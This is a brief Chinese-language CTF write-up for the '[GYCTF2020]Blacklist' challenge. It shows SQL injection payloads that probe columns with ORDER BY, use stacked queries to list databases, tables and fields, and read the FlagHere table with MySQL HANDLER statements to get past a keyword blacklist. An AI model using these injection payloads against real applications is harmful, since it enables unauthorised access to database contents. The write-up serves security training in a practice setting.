[GYCTF2020]Blacklist 1
输入单引号,报错,sql注入.
1' or 1=1 order by 2#没有报错
1' or 1=1 order by 3#报错
先尝试联合查询
1' or 1=1 union select 1,2
发现过滤了大部分关键字
1' or 1=1;show databases;#查库
1' or 1=1;show tables;#查表
1' or 1=1;desc FlagHere;#查字段
HANDLER … OPEN语句打开一个表,使其可以使用后续HANDLER …
READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER … CLOSE或会话终止之前不会关闭
1';
HANDLER FlagHere OPEN;
HANDLER FlagHere READ FIRST;
HANDLER FlagHere CLOSE;#